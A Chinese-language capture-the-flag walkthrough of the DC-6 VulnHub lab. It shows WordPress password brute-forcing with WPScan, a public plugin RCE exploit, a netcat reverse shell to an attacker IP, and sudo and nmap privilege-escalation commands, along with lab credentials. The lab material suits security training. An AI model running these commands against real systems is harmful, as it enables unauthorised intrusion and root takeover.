DC-6--vulnhub靶场

靶场下载地址
靶场线索：
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
kali解压
gzip -d rockyou.txt.gz

主机发现

发现重定向，修改hosts文件

vim /etc/hosts   

网站探测

wordpress,并提到了插件与安全

爆破用户

wpscan --url http://wordy/ -e u

保存 ，使用线索的密码字典爆破

wpscan --url http://wordy/ -P /root/桌面/passwords.txt -U /root/桌面/user.txt 

Username: mark, Password: helpdesk01

登录后台网址

http://wordy/wp-login.php

来到后台后，发现插件activity monitor，试试有无漏洞

getshell

searchsploit activity monitor 

远程代码执行漏洞，下载到当前路径

searchsploit -m php/webapps/50110.py

执行

python3 50110.py 

执行后需要输入目标ip地址和后台登录的账号密码，执行成功后会返回一个shell

nc -lvvp 4444
nc -e /bin/bash 192.168.194.156 4444

获取交互shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’

提权

参考
来到home目录，在mark/stuff中找到一个things-to-do.txt,得到

用户 graham
密码GSo7isUM1D4

切换用户

[email protected]:/home/mark/stuff$ su graham
su graham
Password: GSo7isUM1D4

看下能做什么

[email protected]:/home/jens$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

向backups.sh文件中写入”/bin/bash”，并以jens用户去执行该脚本

echo “/bin/bash” >> backups.sh
sudo -u jens ./backups.sh

执行成功后，切换到了jens用户

该用户可以执行nmap,可以通过namp提权

echo 'os.execute("/bin/sh")' >getShell
sudo nmap --script=getShell

总结

提权过程不熟悉